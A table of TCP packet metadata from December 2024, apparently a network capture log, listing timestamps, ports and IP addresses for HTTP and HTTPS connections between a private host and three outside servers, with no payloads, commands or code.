Dec 20, 2024 10:22:05.729898930 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.729935884 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.730520010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.730604887 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.730664968 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.731344938 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.731532097 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.732182980 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.732237101 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.732325077 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.732382059 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.733036995 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.733335018 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.733503103 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.734308958 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.734321117 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.734375000 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.734750032 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.734918118 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.734971046 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.735626936 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.735961914 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.736481905 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.736538887 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.736726046 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.736779928 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.737385035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.737498999 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.737551928 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.738152981 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.738257885 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.738987923 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.739048004 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.739084005 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.739135981 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.787763119 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.787950039 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.788115978 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.788134098 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.788311005 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.788410902 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.788938046 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.789020061 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.789071083 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.789808035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.848527908 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.848603964 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.848931074 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.849059105 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.849755049 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.849855900 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.850622892 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.850832939 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.851478100 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.851603031 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.851962090 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.851962090 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.852360010 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.852431059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.852483988 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.853219032 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.853312016 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.853353977 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.854064941 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.854155064 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.854216099 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.854887009 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.854939938 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.855355978 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.855724096 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.855829000 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.855873108 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.856583118 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.856698036 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.856753111 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.857527018 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.857575893 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.857655048 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.858356953 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.858458042 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.858584881 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.859159946 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.859283924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.859333038 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.860096931 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.860163927 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.860219002 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.860969067 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.861038923 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.861160994 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.861706018 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.861807108 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.861850023 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.862579107 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.862714052 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.862766027 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.863394022 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.863521099 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.863567114 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.864259005 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.864356041 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.864399910 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.865108013 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.865242958 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.865284920 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.865983963 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.866079092 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.866128922 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.866825104 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.866913080 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.867049932 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.867650032 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.909542084 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.909600019 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.909676075 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.909980059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.910110950 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.910123110 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.910831928 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.910929918 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.910979986 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.911690950 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.911751032 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.911792994 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.912446976 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.912615061 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.912667990 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.913312912 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.913419008 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.913480043 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.914172888 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.914253950 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.914292097 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.915132999 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.915225029 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.915280104 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.915916920 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.915973902 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.916083097 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.916733980 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.916843891 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.916896105 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.917598009 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.917656898 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.917696953 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.918428898 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.918560028 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.918605089 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.919298887 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.919352055 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.919508934 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.920135021 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.920224905 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.920281887 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.920979977 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.921149015 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.921195030 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.921885967 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.921936035 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.921974897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.922691107 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.922827959 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.922871113 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.923645020 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.923706055 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.923738956 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.924479008 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.924549103 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.924637079 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.925298929 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.925359011 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.925375938 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.926111937 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.926233053 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.926316977 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.927010059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.927073956 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.927133083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.927848101 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.927952051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.928011894 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.928662062 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.928719997 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.928781033 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.929512024 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.929630995 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.929693937 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.930366993 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.930433035 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.930577040 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.931235075 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.931263924 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.931349993 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.979686975 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.979758024 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.979872942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.979926109 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.979926109 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.980058908 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.980715990 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.980772972 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.980813980 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.981566906 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:05.981611967 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:05.981697083 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.029474974 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.040688038 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.040708065 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.040785074 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.041213036 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.041275024 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.041994095 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.042038918 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.042093992 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.042139053 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.042946100 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.043019056 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.043682098 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.043730021 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.043766975 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.043808937 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.044513941 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.044630051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.045416117 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.045464039 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.045603037 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.045641899 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.046303988 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.046421051 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.047173023 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.047214031 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.047290087 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.047326088 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.047931910 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.048034906 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.048527956 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.048820019 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.048881054 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.049650908 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.049688101 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.049751997 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.049794912 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.050498009 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.050628901 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.051328897 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.051373005 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.051435947 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.051474094 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.052174091 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.052242994 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.052814007 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.053061008 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.053118944 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.053956985 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.054004908 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.054039001 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.054085016 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.054815054 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.054932117 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.055644035 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.055685043 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.055775881 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.055809021 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.056526899 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.056647062 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.056691885 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.057395935 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.057508945 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.058197975 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.058252096 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.058253050 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.058290958 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.059004068 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.059175968 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.059818983 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.059864998 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.101556063 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.101712942 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.101758957 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.101845980 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.101886988 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.101944923 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.102653980 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.102747917 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.102792025 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.103506088 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.103549004 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.103606939 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.104330063 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.104429007 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.104465961 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.105248928 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.105386019 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.105422974 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.106112003 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.106153965 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.106188059 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.106911898 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.107745886 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.134099007 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:06.253927946 CET	80	49730	160.22.121.182	192.168.2.4
Dec 20, 2024 10:22:06.253982067 CET	49730	80	192.168.2.4	160.22.121.182
Dec 20, 2024 10:22:36.933954000 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:37.053595066 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:37.053692102 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:37.054039001 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:37.173687935 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:38.359555006 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:38.364152908 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:38.483768940 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:38.790900946 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:38.842171907 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:38.977108955 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:38.977149963 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:38.977327108 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:38.986036062 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:38.986054897 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.211410999 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.211493015 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:40.217386007 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:40.217396021 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.217839003 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.264024019 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:40.275273085 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:40.315340042 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.648750067 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.648885012 CET	443	49738	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:40.648942947 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:40.655843019 CET	49738	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:40.660377979 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:40.780003071 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:41.122796059 CET	80	49737	132.226.247.73	192.168.2.4
Dec 20, 2024 10:22:41.125371933 CET	49739	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:41.125464916 CET	443	49739	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:41.125552893 CET	49739	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:41.125885010 CET	49739	443	192.168.2.4	104.21.67.152
Dec 20, 2024 10:22:41.125922918 CET	443	49739	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:41.170331955 CET	49737	80	192.168.2.4	132.226.247.73
Dec 20, 2024 10:22:42.342350960 CET	443	49739	104.21.67.152	192.168.2.4
Dec 20, 2024 10:22:42.346081018 CET	49739	443	192.168.2.4	104.21.67.152
